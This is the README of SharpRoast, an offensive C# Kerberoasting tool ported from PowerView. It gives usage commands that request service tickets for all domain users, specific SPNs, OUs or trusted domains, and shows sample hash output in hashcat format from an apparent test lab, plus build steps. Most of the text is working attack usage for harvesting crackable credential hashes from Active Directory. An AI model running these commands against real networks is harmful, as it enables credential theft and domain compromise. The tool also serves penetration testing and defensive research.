Rubeus via the "kerberoast" action, which provides proper ASN.1 structure parsing.
This project has now been deprecated. Its functionality has been incorporated intoSharpRoast
SharpRoast is a C# port of various PowerView's Kerberoasting functionality. The KerberosRequestorSecurityToken.GetRequest Method() method was contributed to PowerView by @machosec. The hashes are output in hashcat format.
@harmj0y is the primary author of this port.
SharpRoast is licensed under the BSD 3-Clause license.
Usage
Roast all users in the current domain:
C:\Temp>SharpRoast.exe all
SamAccountName : harmj0y
DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
ServicePrincipalName : asdf/asdfasdf
Hash : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...
SamAccountName : sqlservice
DistinguishedName : CN=SQL,CN=Users,DC=testlab,DC=local
ServicePrincipalName : MSSQLSvc/SQL.testlab.local
Hash : $krb5tgs$23$*$testlab.local$MSSQLSvc/SQL.testlab.local*$9994D1...
...
Roast a specific SPN:
C:\Temp>SharpRoast.exe "asdf/asdfasdf"
Hash : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...
Roast a specific user in the current domain:
C:\Temp>SharpRoast.exe harmj0y
SamAccountName : harmj0y
DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
ServicePrincipalName : asdf/asdfasdf
Hash : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...
Roast users from a specified OU in the current domani:
C:\Temp>SharpRoast.exe "OU=TestingOU,DC=testlab,DC=local"
SamAccountName : testuser2
DistinguishedName : CN=testuser2,OU=TestingOU,DC=testlab,DC=local
ServicePrincipalName : service/host
Hash : $krb5tgs$23$*$testlab.local$service/host*$08A6462...
Roast a specific specific SPN in another (trusted) domain:
C:\Temp\>SharpRoast.exe "MSSQLSvc/[email protected]"
Hash : $krb5tgs$23$*user$DOMAIN$MSSQLSvc/[email protected]*$9994D148...
Roast all users in another (trusted) domain:
C:\Temp>SharpRoast.exe "LDAP://DC=dev,DC=testlab,DC=local"
SamAccountName : jason
DistinguishedName : CN=jason,CN=Users,DC=dev,DC=testlab,DC=local
ServicePrincipalName : test/test
Hash : $krb5tgs$23$*$dev.testlab.local$test/test*$9129566...
Any of these commands also accept a [domain.com\user] [password] for to roast with explicit credentials. For example:
C:\Temp>SharpRoast.exe harmj0y "testlab.local\dfm" "Password123!"
SamAccountName : harmj0y
DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
ServicePrincipalName : asdf/asdfasdf
Hash : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...
Compile Instructions
We are not planning on releasing binaries for SharpRoast, so you will have to compile yourself :)
SharpRoast has been built against .NET 3.5 and is compatible with Visual Studio 2015 Community Edition. Simply open up the project .sln, choose "release", and build.